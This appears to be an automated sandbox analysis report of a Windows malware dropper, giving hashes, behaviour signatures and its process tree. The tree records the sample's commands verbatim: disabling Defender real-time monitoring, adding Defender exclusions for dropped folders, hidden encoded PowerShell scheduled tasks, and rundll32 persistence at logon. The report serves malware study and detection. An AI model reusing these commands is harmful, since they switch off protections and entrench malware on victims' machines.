Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
03-10-2023 08:13
General
-
Target
02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe
-
Size
7.2MB
-
MD5
71b7099f3f23955a8bc45829c9d0f05c
-
SHA1
9372a91e395b9b773fa5e354212a5ae6476eb9b5
-
SHA256
02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4
-
SHA512
3532561545e52416c23497f76a0a79a7b8ecb3888f27d16cbcffcf850b043d1b7f96589627938385091855446bfff34b77b73a2d73ca9011d98c6018b3e41b36
-
SSDEEP
196608:91O1W/pZgf52/wbIUXU3GYKPA99OJO1bytyfKhs11:3OEQUwCNUWsJHU
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops Chrome extension 1 IoCs
-
Drops file in System32 directory 9 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe"C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS3717.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS38EB.tmp\Install.exe.\Install.exe /qGSediddTgIM "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOOgUIIfP" /SC once /ST 05:52:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOOgUIIfP"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOOgUIIfP"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhZhLXMKPydttVOkpp" /SC once /ST 08:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj\AJbXeXnhkefSndm\XOqfbvW.exe\" 2K /DYsite_idHmp 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6038113C-D636-40E4-A94C-63B1FCA90766} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {642D97BE-4DC4-4EDD-9838-BDDF22F776A1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj\AJbXeXnhkefSndm\XOqfbvW.exeC:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj\AJbXeXnhkefSndm\XOqfbvW.exe 2K /DYsite_idHmp 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVpSANSxQ" /SC once /ST 06:20:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVpSANSxQ"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVpSANSxQ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaYOHApOQ" /SC once /ST 00:31:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaYOHApOQ"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaYOHApOQ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ntmabZXhibOLMgKk\KsRukCUy\EZgUOGcXPthwRofm.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ntmabZXhibOLMgKk\KsRukCUy\EZgUOGcXPthwRofm.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GZiriljYU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GZiriljYU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LPejASBNERUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LPejASBNERUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpnovHJhDZbGuvpQysR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpnovHJhDZbGuvpQysR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\genmZJWXaUtU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\genmZJWXaUtU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idkLIueePTaHC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idkLIueePTaHC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oURPKsXBiGMpdVVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oURPKsXBiGMpdVVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GZiriljYU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LPejASBNERUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GZiriljYU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LPejASBNERUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpnovHJhDZbGuvpQysR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VpnovHJhDZbGuvpQysR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\genmZJWXaUtU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\genmZJWXaUtU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idkLIueePTaHC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\idkLIueePTaHC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oURPKsXBiGMpdVVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\oURPKsXBiGMpdVVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AZTgzQmTjIbbZTRYj" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ntmabZXhibOLMgKk" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjjPYUknX" /SC once /ST 00:52:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjjPYUknX"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjjPYUknX"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xKesLQoizuLwEuvsY" /SC once /ST 01:06:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ntmabZXhibOLMgKk\JpqXsoCDCfPbKrT\UBDBaHZ.exe\" ri /Bwsite_idVKh 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xKesLQoizuLwEuvsY"3⤵
-
-
-
C:\Windows\Temp\ntmabZXhibOLMgKk\JpqXsoCDCfPbKrT\UBDBaHZ.exeC:\Windows\Temp\ntmabZXhibOLMgKk\JpqXsoCDCfPbKrT\UBDBaHZ.exe ri /Bwsite_idVKh 385118 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhZhLXMKPydttVOkpp"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\GZiriljYU\KfttzO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YWIPQsmrASKeQPr" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5b39a2dd0ee70a0656e7c7605f1c51ff9
SHA11d340b1ceeeb632be807d9a9222330f04ed6e7ee
SHA256b443fca30eb3b7747d305c1752a37c75822731b1a1499ac79008c1691d3c4f6c
SHA512f4511c68e4194c5d118177f65de305238a70833aba991dc27677f89620b7d13558e7daeb5002b052438ee135d4e2c73bb2c2eb247c76adaf7585186237192486
-
Filesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
Filesize
6.1MB
MD550e91b05c3b7d81790a35fed550e6475
SHA17bf8e68a0ddd556d448333eef00012e5e8fae454
SHA256693b54b819fc7779b066aa0e3ff17bf80f1c297c49a381825d5d662a1d5e95a5
SHA512942dac20d64c196740374c96a2169b599596fa72695eddce53995fde7cf753bbc01783db7b71af3cb9379d420983a60f3d6a67dcccdc79dcff9738ec8824b928
-
Filesize
6.1MB
